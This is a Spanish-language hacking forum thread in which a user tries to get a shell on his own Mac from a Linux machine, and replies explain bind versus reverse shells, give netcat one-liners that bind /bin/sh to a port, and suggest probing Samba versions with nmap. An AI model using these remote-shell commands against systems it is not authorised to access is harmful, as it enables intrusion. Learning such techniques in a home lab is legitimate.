elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Conseguir Shell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Conseguir Shell  (Leído 3,122 veces)
frantheviking

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Conseguir Shell
« en: 6 Diciembre 2012, 23:13 pm »


Hola,

tengo dos ordenadores conectados en mi red, uno con linunx, y otro con MAC OSX.

He buscado con nmap los puertos abiertos del MAC desde mi linux, he probado a conseguir shell con mi linux en el MAC, pero sin resultados positivos.

Este es el resultado de mi nmap sobre la victima:

Nmap scan report for 192.168.1.8
Host is up (0.0050s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE
88/tcp  open  kerberos-sec
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
515/tcp open  printer
548/tcp open  afp
631/tcp open  ipp

Que posibilidades tengo? He hecho nc -l -p 139 y en la victima nc -e /bin/sh 192.168.1.8 139, pero de nuevo nada de nada

Gracias
En línea

RevangelyonX

Desconectado Desconectado

Mensajes: 245


Ver Perfil WWW
Re: Conseguir Shell
« Respuesta #1 en: 7 Diciembre 2012, 14:52 pm »

Hola

Posibilidades ninguna.

Estas confundiendo terminos básicos de bind shell reverse shell etc.

Lo que quieres es obtener una shell de pruebas sin explotar ningun servicio. Por lo tanto el escenario puede ser el siguiente:

Vic1 escuchando un puerto y -e /bin/sh (esto es bind)
o
Vic1 conectandose a un puerto y maquina remota y -e /bin/sh (esto es reverse shell)

El problema de tu caso es que primero confundes victima con atacante. Segundo que no puedes hacer un listen en un puerto que ya esta open.

Te sugiero lo siguiente:
victima
nc -nlp 4444 -e /bin/sh

atacante
nc ip.dd.victima 4444

esto Es una bind shell.

Le información sobre el uso de Netcat y sus posibiliades.
Salu2
En línea

Just Linux
OSCP certified
adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: Conseguir Shell
« Respuesta #2 en: 20 Diciembre 2012, 13:25 pm »

 que version de samba esta corriendo en tu Mac?
ejecuta:
nmap -sSV -T5 -A ip


Algunas versiones de samba que corren sobre Mac son vulnerables, esa seria tu única alternativa de entrar en aquella máquina.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema para conseguir remote shell
Hacking
Debci 5 6,529 Último mensaje 10 Enero 2010, 04:31 am
por R007h
Conseguir Shell con Netcat « 1 2 3 »
Hacking
Pyr0s 24 13,890 Último mensaje 13 Enero 2010, 18:57 pm
por Debci
>>DUDA<< Conseguir shell de un servidor casero de un juego
Hacking
JCRb 0 2,335 Último mensaje 4 Enero 2012, 23:23 pm
por JCRb
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines